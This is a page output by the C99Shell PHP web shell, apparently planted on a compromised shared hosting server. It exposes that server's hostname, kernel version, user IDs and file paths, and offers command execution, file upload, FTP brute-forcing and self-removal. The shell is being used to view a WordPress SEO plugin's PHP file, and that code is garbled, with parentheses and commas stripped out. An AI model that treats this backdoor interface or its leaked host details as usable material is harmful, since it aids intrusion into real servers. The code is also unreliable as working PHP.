!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/wordpress-seo/admin/   drwxr-xr-x
Free 180.07 GB of 490.84 GB (36.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     class-plugin-compatibility.php (2.62 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package WPSEO\Plugin_Compatibility
 */

/**
 * Class WPSEO_Plugin_Compatibility
 */
class WPSEO_Plugin_Compatibility {

    
/**
     * @var string
     */
    
protected $current_wpseo_version;

    
/**
     * @var WPSEO_Plugin_Availability
     */
    
protected $availability_checker;

    
/**
     * @var array
     */
    
protected $installed_plugins;

    
/**
     * WPSEO_Plugin_Compatibility constructor.
     *
     * @param string     $version The version to check against.
     * @param null|class $availability_checker The checker to use.
     */
    
public function __construct$version$availability_checker null ) {
        
// We trim off the patch version, as this shouldn't break the comparison.
        
$this->current_wpseo_version $this->get_major_minor_version$version );
        
$this->availability_checker $this->retrieve_availability_checker$availability_checker );
        
$this->installed_plugins $this->availability_checker->get_installed_plugins();
    }

    
/**
     * Retrieves the availability checker.
     *
     * @param null|object $checker The checker to set.
     *
     * @return WPSEO_Plugin_Availability The checker to use.
     */
    
private function retrieve_availability_checker$checker ) {
        if ( 
is_null$checker ) || ! is_object$checker ) ) {
            return new 
WPSEO_Plugin_Availability();
        }

        return 
$checker;
    }

    
/**
     * Wraps the availability checker's get_installed_plugins method.
     *
     * @return array Array containing all the installed plugins.
     */
    
public function get_installed_plugins() {
        return 
$this->installed_plugins;
    }

    
/**
     * Creates a list of installed plugins and whether or not they are compatible.
     *
     * @return array Array containing the installed plugins and compatibility.
     */
    
public function get_installed_plugins_compatibility() {
        foreach ( 
$this->installed_plugins as $key => $plugin ) {

            
$this->installed_plugins$key ]['compatible'] = $this->is_compatible$key );
        }

        return 
$this->installed_plugins;
    }

    
/**
     * Checks whether or not a plugin is compatible.
     *
     * @param string $plugin The plugin to look for and match.
     *
     * @return bool Whether or not the plugin is compatible.
     */
    
public function is_compatible$plugin ) {
        
$plugin $this->availability_checker->get_plugin$plugin );
        
$plugin_version $this->availability_checker->get_version$plugin );

        return 
$this->get_major_minor_version$plugin_version ) === $this->current_wpseo_version;
    }

    
/**
     * Gets the major/minor version of the plugin for easier comparing.
     *
     * @param string $version The version to trim.
     *
     * @return string The major/minor version of the plugin.
     */
    
protected function get_major_minor_version$version ) {
        return 
substr$version0);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.141 ]--